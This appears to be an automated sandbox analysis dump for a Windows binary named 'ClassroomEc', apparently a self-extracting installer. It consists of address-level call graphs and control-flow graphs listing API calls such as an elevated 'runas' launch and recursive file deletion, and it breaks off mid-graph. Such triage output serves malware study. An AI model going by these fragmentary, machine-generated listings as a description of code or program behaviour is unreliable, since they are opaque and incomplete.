d84800 memcpy 20804->20811 20813 d7fcc0 20804->20813 20809 d7a976 20807->20809 20808 d7a9d5 20808->20800 20809->20808 20817 d6e380 20809->20817 20812 d84838 20811->20812 20812->20804 20815 d7fce2 20813->20815 20814 d7fd64 20814->20804 20815->20814 20816 d7fe94 memcpy 20815->20816 20816->20814 20819 d6e38d codecvt 20817->20819 20818 d6e310 105 API calls 20818->20819 20819->20818 20820 d6dfe0 103 API calls 20819->20820 20821 d6e2b0 2 API calls 20819->20821 20822 d6e4b8 20819->20822 20823 d77000 2 API calls 20819->20823 20820->20819 20821->20819 20822->20809 20823->20819 20983 d6a650 20984 d6a662 20983->20984 20985 d6a66c 20983->20985 20995 d6a6b0 memset 20984->20995 20989 d6a66a 20985->20989 21005 d68ca0 20985->21005 21010 d68f70 20989->21010 20992 d62370 _DebugHeapAllocator 3 API calls 20993 d6a691 20992->20993 20994 d74cd0 codecvt ??3@YAXPAX 20993->20994 20994->20989 21014 d6d910 20995->21014 20997 d6a6dd SHBrowseForFolderW 20998 d6a70e SHGetPathFromIDListW 20997->20998 21002 d6a709 20997->21002 20999 d6a72f 20998->20999 21000 d6a74b SHGetMalloc 20998->21000 21001 d61d50 _DebugHeapAllocator 3 API calls 20999->21001 21000->21002 21003 d6a740 21001->21003 21002->20989 21004 d6a5f0 25 API calls 21003->21004 21004->21000 21015 d68a60 GetDlgItem 21005->21015 21007 d68cb3 21008 d65c20 10 API calls 21007->21008 21009 d68cbd 21008->21009 21009->20992 21011 d68fa2 21010->21011 21013 d68f88 21010->21013 21012 d67450 EndDialog 21011->21012 21011->21013 21012->21013 21014->20997 21015->21007 22272 d7195e 22273 d71967 22272->22273 22274 d70870 _CxxThrowException 22273->22274 22319 d71aba 22273->22319 22276 d7197b 22274->22276 22275 d71b7f 22278 d74b20 2 API calls 22275->22278 22279 d7198f 22276->22279 22330 d70ba0 _CxxThrowException 22276->22330 22280 d71b8c 22278->22280 22284 d719a4 22279->22284 22331 d70ba0 _CxxThrowException 22279->22331 22282 d74b20 2 API calls 22280->22282 22290 d71b9c 22282->22290 22285 d708c0 _CxxThrowException 22284->22285 22297 d719b6 codecvt 22284->22297 22285->22297 22286 d71b56 codecvt 22287 d71d4c codecvt 22286->22287 22289 d708c0 _CxxThrowException 22286->22289 22310 d73dd0 3 API calls 22287->22310 22288 d707c0 _CxxThrowException _CxxThrowException 22288->22290 22289->22287 22290->22288 22291 d71c54 22290->22291 22292 d70ba0 _CxxThrowException 22290->22292 22293 d71cc5 22291->22293 22294 d70b60 2 API calls 22291->22294 22336 d70ba0 _CxxThrowException 22291->22336 22292->22290 22293->22286 22337 d70ba0 _CxxThrowException 22293->22337 22294->22291 22298 d73e60 4 API calls 22297->22298 22299 d71a44 22297->22299 22298->22299 22300 d71a7c 22299->22300 22302 d70b60 2 API calls 22299->22302 22301 d71a90 22300->22301 22334 d70ba0 _CxxThrowException 22300->22334 22305 d70b60 2 API calls 22301->22305 22301->22319 22304 d71a5c 22302->22304 22306 d71a6a 22304->22306 22332 d70ba0 _CxxThrowException 22304->22332 22313 d71aa5 22305->22313 22308 d70b60 2 API calls 22306->22308 22309 d71a72 22308->22309 22309->22300 22333 d70ba0 _CxxThrowException 22309->22333 22312 d71de1 22310->22312 22338 d704f0 ??3@YAXPAX 22312->22338 22314 d708c0 _CxxThrowException 22313->22314 22313->22319 22314->22319 22316 d71de9 22339 d704f0 ??3@YAXPAX 22316->22339 22318 d71df1 22320 d715b0 _CxxThrowException 22318->22320 22319->22275 22319->22286 22335 d70ba0 _CxxThrowException 22319->22335 22321 d71e08 22320->22321 22340 d74180 ??3@YAXPAX ??2@YAPAXI 22321->22340 22323 d717f0 _CxxThrowException 22325 d71e17 codecvt 22323->22325 22324 d717f0 _CxxThrowException 22326 d71e66 22324->22326 22325->22323 22325->22326 22326->22324 22327 d71e8b 22326->22327 22328 d71110 _CxxThrowException 22326->22328 22329 d71600 5 API calls 22326->22329 22328->22326 22329->22326 22330->22279 22331->22284 22332->22306 22333->22300 22334->22301 22335->22275 22336->22291 22337->22286 22338->22316 22339->22318 22340->22325 22490 d7116c 22492 d71175 codecvt 22490->22492 22494 d70870 _CxxThrowException 22492->22494 22520 d712af 22492->22520 22493 d712e5 codecvt 22496 d71330 22493->22496 22503 d70b60 _CxxThrowException _CxxThrowException 22493->22503 22495 d7119c 22494->22495 22500 d711b0 22495->22500 22524 d70ba0 _CxxThrowException 22495->22524 22497 d7133d 22496->22497 22531 d70ba0 _CxxThrowException 22496->22531 22532 d74100 22497->22532 22510 d711d2 22500->22510 22525 d70ba0 _CxxThrowException 22500->22525 22503->22493 22505 d713a6 22506 d70b60 2 API calls 22507 d713a8 codecvt 22506->22507 22507->22505 22507->22506 22509 d7135b codecvt 22509->22505 22537 d70ba0 _CxxThrowException 22509->22537 22511 d71268 22510->22511 22512 d70b60 2 API calls 22510->22512 22513 d712b1 22511->22513 22514 d7127d 22511->22514 22515 d7125a 22512->22515 22518 d70480 ??3@YAXPAX 22513->22518 22517 d70b60 2 API calls 22514->22517 22516 d70b60 2 API calls 22515->22516 22516->22511 22519 d71285 22517->22519 22518->22520 22521 d73d80 2 API calls 22519->22521 22526 d74080 22520->22526 22522 d71297 codecvt 22521->22522 22523 d708d0 2 API calls 22522->22523 22523->22520 22524->22500 22525->22510 22527 d74096 22526->22527 22528 d74094 22526->22528 22529 d740a3 ??2@YAPAXI 22527->22529 22530 d740c8 ??3@YAXPAX 22527->22530 22528->22493 22529->22530 22530->22528 22531->22497 22533 d74116 22532->22533 22534 d71355 22532->22534 22535 d74123 ??2@YAPAXI 22533->22535 22536 d74148 ??3@YAXPAX 22533->22536 22534->22507 22534->22509 22535->22536 22536->22534 22537->22505 21090 d72215 21095 d721b4 codecvt std::exception::exception 21090->21095 21092 d717f0 _CxxThrowException 21092->21095 21093 d7225d codecvt 21094 d7222d codecvt 21094->21093 21097 d716a0 _CxxThrowException 21094->21097 21095->21092 21095->21094 21096 d71110 _CxxThrowException 21095->21096 21098 d726e0 3 API calls 21095->21098 21099 d721bc codecvt 21095->21099 21101 d72470 4 API calls 21095->21101 21103 d704f0 ??3@YAXPAX 21095->21103 21096->21095 21097->21094 21098->21095 21100 d72470 4 API calls 21099->21100 21102 d72377 codecvt 21099->21102 21100->21102 21101->21095 21103->21095 22538 d62312 22539 d62218 22538->22539 22540 d622aa 22539->22540 22541 d791e0 2 API calls 22539->22541 22542 d61d70 GetProcAddress 22540->22542 22557 d62346 22540->22557 22543 d62240 22541->22543 22544 d6231c 22542->22544 22545 d791a0 2 API calls 22543->22545 22546 d74cd0 codecvt ??3@YAXPAX 22544->22546 22548 d6224d 22545->22548 22547 d6232e 22546->22547 22549 d74cd0 codecvt ??3@YAXPAX 22547->22549 22550 d79160 2 API calls 22548->22550 22551 d62336 22549->22551 22552 d6225a codecvt 22550->22552 22553 d63670 codecvt 2 API calls 22551->22553 22556 d616a0 _DebugHeapAllocator 2 API calls 22552->22556 22554 d6233e 22553->22554 22555 d74cd0 codecvt ??3@YAXPAX 22554->22555 22555->22557 22558 d6226d 22556->22558 22585 d704f0 ??3@YAXPAX 22558->22585 22560 d62275 22586 d704f0 ??3@YAXPAX 22560->22586 22562 d6227d 22587 d704f0 ??3@YAXPAX 22562->22587 22564 d62285 codecvt 22565 d61e40 12 API calls 22564->22565 22566 d6229b 22565->22566 22567 d622a2 22566->22567 22568 d622ac 22566->22568 22571 d74cd0 codecvt ??3@YAXPAX 22567->22571 22569 d622b7 GetLastError 22568->22569 22570 d622c4 codecvt 22568->22570 22569->22570 22572 d622d6 22569->22572 22574 d6b300 51 API calls 22570->22574 22571->22540 22573 d674e0 22 API calls 22572->22573 22575 d622de 22573->22575 22574->22572 22576 d74cd0 codecvt ??3@YAXPAX 22575->22576 22577 d622ed 22576->22577 22578 d74cd0 codecvt ??3@YAXPAX 22577->22578 22579 d622f5 22578->22579 22580 d74cd0 codecvt ??3@YAXPAX 22579->22580 22581 d622fd 22580->22581 22582 d63670 codecvt 2 API calls 22581->22582 22583 d62305 22582->22583 22584 d74cd0 codecvt ??3@YAXPAX 22583->22584 22584->22540 22585->22560 22586->22562 22587->22564 21137 d88810 21140 d68830 21137->21140 21144 d68841 codecvt 21140->21144 21141 d68888 21146 d704f0 ??3@YAXPAX 21141->21146 21143 d68890 21144->21141 21145 d665d0 codecvt 2 API calls 21144->21145 21145->21144 21146->21143 21152 d6bc1d 21155 d6bc2c codecvt SafeRWList 21152->21155 21153 d6bd97 21154 d6d320 6 API calls 21153->21154 21191 d6bdae codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21154->21191 21155->21153 21156 d76610 12 API calls 21155->21156 21157 d6bc7f 21156->21157 21158 d6bcc3 21157->21158 21159 d6bc91 21157->21159 21163 d6bcd5 21158->21163 21171 d6bd19 21158->21171 21160 d6d300 11 API calls 21159->21160 21161 d6bca8 21160->21161 21162 d6d200 ??3@YAXPAX 21161->21162 21165 d6bcb0 21162->21165 21167 d6bd17 21163->21167 21168 d6bce7 21163->21168 21164 d6c267 _Error_objects 21172 d6c2a6 ??2@YAPAXI 21164->21172 21166 d6d2b0 3 API calls 21165->21166 21169 d6bcb8 21166->21169 21183 d6d300 11 API calls 21167->21183 21173 d6d300 11 API calls 21168->21173 21170 d6bd3c 21174 d6d300 11 API calls 21170->21174 21171->21167 21171->21170 21176 d6c2bf 21172->21176 21186 d6c2ca codecvt 21172->21186 21177 d6bcfc 21173->21177 21175 d6bd51 21174->21175 21178 d6d200 ??3@YAXPAX 21175->21178 21179 d6d350 InitializeCriticalSection 21176->21179 21180 d6d200 ??3@YAXPAX 21177->21180 21181 d6bd59 21178->21181 21179->21186 21182 d6bd04 21180->21182 21184 d6d2b0 3 API calls 21181->21184 21185 d6d2b0 3 API calls 21182->21185 21183->21153 21184->21169 21185->21169 21187 d6c342 21186->21187 21194 d6c37f codecvt SafeRWList _Error_objects 21186->21194 21188 d634f0 codecvt 11 API calls 21187->21188 21190 d6c359 21188->21190 21189 d6c5ac 21197 d6dc60 ??2@YAPAXI 21189->21197 21195 d6da30 codecvt 11 API calls 21190->21195 21191->21164 21192 d6bf8b 21191->21192 21199 d6bec0 21191->21199 21207 d6bef0 codecvt 21191->21207 21193 d634f0 codecvt 11 API calls 21192->21193 21250 d6bf96 codecvt SafeRWList Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 21193->21250 21194->21189 21200 d6c402 21194->21200 21201 d6c48a ??2@YAPAXI 21194->21201 21196 d6c364 21195->21196 21198 d6d200 ??3@YAXPAX 21196->21198 21220 d6c5ce codecvt 21197->21220 21202 d6c36c 21198->21202 21203 d634f0 codecvt 11 API calls 21199->21203 21291 d76de0 3 API calls 21200->21291 21221 d6c479 _Error_objects 21201->21221 21204 d6d2b0 3 API calls 21202->21204 21205 d6bed5 21203->21205 21204->21169 21209 d6d200 ??3@YAXPAX 21205->21209 21206 d6c74d 21297 d704f0 ??3@YAXPAX 21206->21297 21290 d84af0 2 API calls 21207->21290 21208 d6c422 21211 d6c431 21208->21211 21208->21221 21212 d6bedd 21209->21212 21214 d634f0 codecvt 11 API calls 21211->21214 21215 d6d2b0 3 API calls 21212->21215 21213 d6c762 21218 d634f0 codecvt 11 API calls 21213->21218 21219 d6c448 21214->21219 21215->21169 21216 d6c61d SafeRWList 21222 d74ec0 _CxxThrowException 21216->21222 21238 d6c669 codecvt _Error_objects 21216->21238 21217 d6bf28 21217->21192 21227 d6bf59 21217->21227 21224 d6c76d 21218->21224 21225 d634f0 codecvt 11 API calls 21219->21225 21220->21206 21220->21216 21223 d6c4fb ??2@YAPAXI 21221->21223 21226 d6c649 21222->21226 21231 d6c514 21223->21231 21228 d6da30 codecvt 11 API calls 21224->21228 21230 d6c453 21225->21230 21232 d6c650 ??2@YAPAXI 21226->21232 21226->21238 21233 d634f0 codecvt 11 API calls 21227->21233 21235 d6c778 21228->21235 21229 d6c04b 21234 d634f0 codecvt 11 API calls 21229->21234 21236 d6da30 codecvt 11 API calls 21230->21236 21237 d75e30 4 API calls 21231->21237 21232->21238 21239 d6bf70 21233->21239 21240 d6c056 21234->21240 21241 d6d200 ??3@YAXPAX 21235->21241 21242 d6c45e 21236->21242 21263 d6c54f codecvt _Error_objects 21237->21263 21289 d75a00 122 API calls 21238->21289 21243 d6d200 ??3@YAXPAX 21239->21243 21244 d6dc10 ??2@YAPAXI 21240->21244 21245 d6c780 21241->21245 21246 d6d200 ??3@YAXPAX 21242->21246 21247 d6bf78 21243->21247 21248 d6c077 21244->21248 21249 d6d2b0 3 API calls 21245->21249 21251 d6c466 21246->21251 21253 d6d2b0 3 API calls 21247->21253 21254 d6dc60 ??2@YAPAXI 21248->21254 21249->21169 21250->21229 21257 d6c019 21250->21257 21252 d6d2b0 3 API calls 21251->21252 21252->21169 21253->21169 21256 d6c089 21254->21256 21255 d6c703 21258 d634f0 codecvt 11 API calls 21255->21258 21273 d6c0bf 21256->21273 21275 d6c1dd codecvt 21256->21275 21259 d634f0 codecvt 11 API calls 21257->21259 21260 d6c714 21258->21260 21261 d6c030 21259->21261 21296 d704f0 ??3@YAXPAX 21260->21296 21264 d6d200 ??3@YAXPAX 21261->21264 21270 d634f0 codecvt 11 API calls 21263->21270 21266 d6c038 21264->21266 21265 d6c71f 21267 d634f0 codecvt 11 API calls 21265->21267 21268 d6d2b0 3 API calls 21266->21268 21269 d6c72a 21267->21269 21268->21169 21271 d6da30 codecvt 11 API calls 21269->21271 21270->21189 21272 d6c735 21271->21272 21274 d6d200 ??3@YAXPAX 21272->21274 21285 d6c0da codecvt 21273->21285 21292 d704f0 ??3@YAXPAX 21273->21292 21277 d6c73d 21274->21277 21294 d704f0 ??3@YAXPAX 21275->21294 21281 d6d2b0 3 API calls 21277->21281 21279 d6c14b 21293 d704f0 ??3@YAXPAX 21279->21293 21281->21169 21282 d6c25c 21295 d704f0 ??3@YAXPAX 21282->21295 21283 d6c156 21286 d6d200 ??3@YAXPAX 21283->21286 21287 d6c15e 21286->21287 21288 d6d2b0 3 API calls 21287->21288 21288->21169 21289->21255 21290->21217 21291->21208 21292->21279 21293->21283 21294->21282 21295->21164 21296->21265 21297->21213 21358 d7323a 21400 d72760 21358->21400 21360 d73e10 3 API calls 21397 d72dc6 codecvt std::exception::exception 21360->21397 21361 d708c0 _CxxThrowException 21361->21397 21362 d717f0 _CxxThrowException 21362->21397 21363 d72deb 21364 d717f0 _CxxThrowException 21363->21364 21365 d733b2 codecvt 21364->21365 21367 d733cf 21365->21367 21409 d70ba0 _CxxThrowException 21365->21409 21369 d73575 21367->21369 21384 d7343a codecvt 21367->21384 21368 d706c0 _CxxThrowException 21368->21397 21410 d704f0 ??3@YAXPAX 21369->21410 21371 d7357d 21411 d704f0 ??3@YAXPAX 21371->21411 21373 d73585 21412 d704f0 ??3@YAXPAX 21373->21412 21375 d72650 _CxxThrowException ??3@YAXPAX ??2@YAPAXI 21375->21397 21376 d72760 6 API calls 21376->21397 21377 d7358d 21378 d73670 3 API calls 21377->21378 21379 d73595 21378->21379 21380 d6f630 codecvt ??3@YAXPAX 21379->21380 21382 d735a7 21380->21382 21381 d726e0 3 API calls 21381->21397 21413 d704f0 ??3@YAXPAX 21382->21413 21383 d73570 21384->21383 21387 d73f30 3 API calls 21384->21387 21386 d735af 21389 d74390 2 API calls 21386->21389 21387->21383 21388 d73d80 2 API calls 21388->21397 21390 d735b7 21389->21390 21391 d70730 _CxxThrowException _CxxThrowException 21391->21397 21392 d74b20 ??3@YAXPAX ??2@YAPAXI 21392->21397 21393 d73620 2 API calls 21393->21397 21396 d716a0 _CxxThrowException 21396->21397 21397->21360 21397->21361 21397->21362 21397->21363 21397->21368 21397->21375 21397->21376 21397->21381 21397->21388 21397->21391 21397->21392 21397->21393 21397->21396 21398 d741e0 ??3@YAXPAX ??2@YAPAXI 21397->21398 21399 d704f0 ??3@YAXPAX 21397->21399 21398->21397 21399->21397 21401 d726e0 3 API calls 21400->21401 21402 d72779 21401->21402 21403 d70730 2 API calls 21402->21403 21404 d72791 21403->21404 21405 d6d930 2 API calls 21404->21405 21406 d727a0 21405->21406 21407 d72815 21406->21407 21414 d72830 21406->21414 21407->21397 21409->21367 21410->21371 21411->21373 21412->21377 21413->21386 21417 d70c10 21414->21417 21418 d70c2f 21417->21418 21419 d70c2a 21417->21419 21418->21406 21420 d708c0 _CxxThrowException 21419->21420 21420->21418 21430 d73425 21431 d7342e 21430->21431 21432 d73575 21431->21432 21433 d7343a codecvt 21431->21433 21450 d704f0 ??3@YAXPAX 21432->21450 21444 d73570 21433->21444 21447 d73f30 3 API calls 21433->21447 21435 d7357d 21451 d704f0 ??3@YAXPAX 21435->21451 21437 d73585 21452 d704f0 ??3@YAXPAX 21437->21452 21439 d7358d 21440 d73670 3 API calls 21439->21440 21441 d73595 21440->21441 21442 d6f630 codecvt ??3@YAXPAX 21441->21442 21443 d735a7 21442->21443 21453 d704f0 ??3@YAXPAX 21443->21453 21446 d735af 21448 d74390 2 API calls 21446->21448 21447->21444 21449 d735b7 21448->21449 21450->21435 21451->21437 21452->21439 21453->21446 22687 d68f20 22690 d6d910 22687->22690 22689 d68f35 GetWindowRect 22690->22689 22697 d70f2f 22698 d70f37 22697->22698 22700 d704f0 ??3@YAXPAX 22697->22700 22700->22698

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 547 d65e70-d65e80 548 d65e8b-d65e98 547->548 549 d65eaf-d65ebc 548->549 550 d65e9a-d65ea9 548->550 553 d65ebe-d65ec3 549->553 554 d65ec8-d65f00 GetLastError wsprintfW GetEnvironmentVariableW GetLastError 549->554 551 d65ead 550->551 552 d65eab 550->552 551->548 552->549 558 d66129-d6612c 553->558 555 d65f06-d65f4c ??2@YAPAXI@Z GetEnvironmentVariableW 554->555 556 d65fff-d66016 SetLastError 554->556 559 d65fe7-d65ffc ??3@YAXPAX@Z 555->559 560 d65f52-d65f5a GetLastError 555->560 561 d66018-d66024 556->561 562 d66029-d66045 556->562 559->556 560->559 563 d65f60-d65f6d 560->563 561->558 564 d66047-d66052 call d65e00 562->564 565 d66063-d660b1 lstrlenA ??2@YAPAXI@Z 562->565 568 d65fd6-d65fdf 563->568 569 d65f6f-d65f88 lstrcmpiW 563->569 564->565 576 d66054-d66060 564->576 566 d660f2-d66123 MultiByteToWideChar 565->566 567 d660b3-d660db GetLocaleInfoW 565->567 566->558 567->566 571 d660dd-d660ed _wtol 567->571 574 d65fe5 568->574 572 d65fbc-d65fd1 ??3@YAXPAX@Z 569->572 573 d65f8a-d65fba ??3@YAXPAX@Z 569->573 571->566 577 d65fd4 572->577 573->577 574->556 576->565 577->574
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D65EC8
                                                                                                                                                              • wsprintfW.USER32 ref: 00D65EDE
                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00D65EEF
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D65EF8
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00D65F1D
                                                                                                                                                              • GetEnvironmentVariableW.KERNEL32(?,?,00D6B311), ref: 00D65F43
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00D65F52
                                                                                                                                                              • lstrcmpiW.KERNEL32(00000000,?), ref: 00D65F80
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00D65FA3
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00D65FCC
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00D65FF7
                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 00D66003
                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00D66067
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00D6608A
                                                                                                                                                              • GetLocaleInfoW.KERNELBASE(00000000,00001004,?,0000001F), ref: 00D660D3
                                                                                                                                                              • _wtol.MSVCRT(?), ref: 00D660E4
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E4,00000000,?,?,00000000,?), ref: 00D66117
                                                                                                                                                                • Part of subcall function 00D65E00: GetUserDefaultUILanguage.KERNEL32(?,00D6604C), ref: 00D65E0E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$??3@$??2@EnvironmentVariable$ByteCharDefaultInfoLanguageLocaleMultiUserWide_wtollstrcmpilstrlenwsprintf
                                                                                                                                                              • String ID: SfxString%d
                                                                                                                                                              • API String ID: 1359506875-944934635
                                                                                                                                                              • Opcode ID: 3005173fe1aa6668a90c12de985bdfd8914515d51fb99a0fdbf7cd2405feb1ad
                                                                                                                                                              • Instruction ID: c3f9bd470c997118fe4b0760e317743f957be71391e40b557f6f83575888b5a8
                                                                                                                                                              • Opcode Fuzzy Hash: 3005173fe1aa6668a90c12de985bdfd8914515d51fb99a0fdbf7cd2405feb1ad
                                                                                                                                                              • Instruction Fuzzy Hash: EE8139B0910304DBEB14DFA8D859BADB7B6EB44304F18465DE50AAB285D731E985CF21
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D64EE0
                                                                                                                                                                • Part of subcall function 00D79450: _wmemmove.LIBCMTD ref: 00D7948E
                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00D89854,00D650E8), ref: 00D64F02
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D64F1C
                                                                                                                                                              • lstrcmpW.KERNEL32(?,00D89850,?,0000005C,00D650E8), ref: 00D64F51
                                                                                                                                                              • lstrcmpW.KERNEL32(?,00D89848), ref: 00D64F67
                                                                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,00000000,?,0000005C,00D650E8), ref: 00D64FB0
                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 00D64FC3
                                                                                                                                                              • FindNextFileW.KERNELBASE(000000FF,?), ref: 00D64FF5
                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00D65007
                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00000000), ref: 00D65018
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00D650E8,00000000), ref: 00D65024
                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00D650E8), ref: 00D65032
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Find$AllocatorAttributesDebugDirectoryHeaplstrcmp$CloseCurrentDeleteFirstNextRemove_wmemmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 430740293-0
                                                                                                                                                              • Opcode ID: dae98f05018b0f67ee24c66b6003e19a0244898c48ddb1077638b1cbfc8d3044
                                                                                                                                                              • Instruction ID: 7a8e5d132af43ecb4cb17fe5ae115d9578c4b5c11c2cc5c7a52eb6713cf24ae0
                                                                                                                                                              • Opcode Fuzzy Hash: dae98f05018b0f67ee24c66b6003e19a0244898c48ddb1077638b1cbfc8d3044
                                                                                                                                                              • Instruction Fuzzy Hash: 9F412274914209EBDB14EF60EC99BEEB378EF14344F584198F41AD6190EB709A48DF74
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1359 d61e40-d61e87 call d610d0 * 2 memset 1364 d61e9b-d61ea1 1359->1364 1365 d61e89-d61e98 1359->1365 1366 d61ea3 1364->1366 1367 d61eaa-d61eb3 1364->1367 1365->1364 1366->1367 1368 d61eb5-d61ebd 1367->1368 1369 d61ec0-d61ee3 call d638f0 call d61d50 call d6d910 1367->1369 1368->1369 1376 d61ee5-d61eff call d74cd0 * 2 1369->1376 1377 d61f01-d61f23 call d612d0 * 2 ShellExecuteExW 1369->1377 1386 d61f7c-d61f7f 1376->1386 1387 d61f25-d61f2e 1377->1387 1388 d61f62-d61f79 call d74cd0 * 2 1377->1388 1390 d61f30-d61f36 WaitForSingleObject 1387->1390 1391 d61f3c-d61f60 CloseHandle call d74cd0 * 2 1387->1391 1388->1386 1390->1391 1391->1386
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00D61E5E
                                                                                                                                                              • _DebugHeapAllocator.LIBCPMTD ref: 00D61ED4
                                                                                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00D61F1B
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D61F36
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00D61F40
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.2248712226.0000000000D61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00D60000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.2248689297.0000000000D60000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248750476.0000000000D89000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248772948.0000000000D8D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.2248797771.0000000000D90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_d60000_ClassroomEc.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocatorCloseDebugExecuteHandleHeapObjectShellSingleWaitmemset
                                                                                                                                                              • String ID: <$runas
                                                                                                                                                              • API String ID: 46794241-1187129395
                                                                                                                                                              • Opcode ID: f34eed5d5db42c92b249cf00c2c1310ee59c95edfc5005bbc42df89c245aa2d8
                                                                                                                                                              • Instruction ID: c7aa6234e87b8a99c0f4153983448f8052a79170f896494187b061e28b54b8e3
                                                                                                                                                              • Opcode Fuzzy Hash: f34eed5d5db42c92b249cf00c2c1310ee59c95edfc5005bbc42df89c245aa2d8
                                                                                                                                                              • Instruction Fuzzy Hash: 42312775D1020C9BDB05EFD5D89AAEEB774FF14300F188118F416AB295EB74AA49CBB0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1471 d64c30-d64c6a lstrlenW call d616a0 call d635b0 1476 d64c7c-d64c8f 1471->1476 1477 d64c6c-d64c7a 1471->1477 1478 d64c92-d64c95 1476->1478 1477->1476 1477->1478 1479 d64c98-d64c9f 1478->1479 1480 d64ca5-d64ca9 call d63d20 1479->1480 1481 d64d6e-d64d85 GetSystemTimeAsFileTime GetFileAttributesW 1479->1481 1487 d64cae-d64cb3 1480->1487 1482 d64d87-d64d99 call d63c80 1481->1482 1483 d64db2-d64db6 call d63d20 1481->1483 1482->1483 1493 d64d9b-d64dad call d74cd0 1482->1493 1491 d64dbb-d64dc0 1483->1491 1488 d64cb5 1487->1488 1489 d64cba 1487->1489 1488->1481 1492 d64cc5-d64cc9 1489->1492 1494 d64dc2-d64de4 call d6b300 call d74cd0 1491->1494 1495 d64de9-d64def 1491->1495 1497 d64ceb-d64cef 1492->1497 1498 d64ccb-d64cd8 1492->1498 1517 d64ec0-d64ec3 1493->1517 1494->1517 1499 d64df5-d64e27 memcpy 1495->1499 1500 d64eae-d64ebd call d74cd0 1495->1500 1507 d64cf1-d64cf5 1497->1507 1508 d64d5d-d64d69 1497->1508 1498->1497 1503 d64cda-d64ce7 1498->1503 1505 d64e32-d64e3e 1499->1505 1506 d64e29-d64e2f 1499->1506 1500->1517 1503->1497 1511 d64ce9 1503->1511 1513 d64e40-d64e4d 1505->1513 1514 d64e69-d64e83 call d63d20 1505->1514 1506->1505 1515 d64d36-d64d58 call d6b300 call 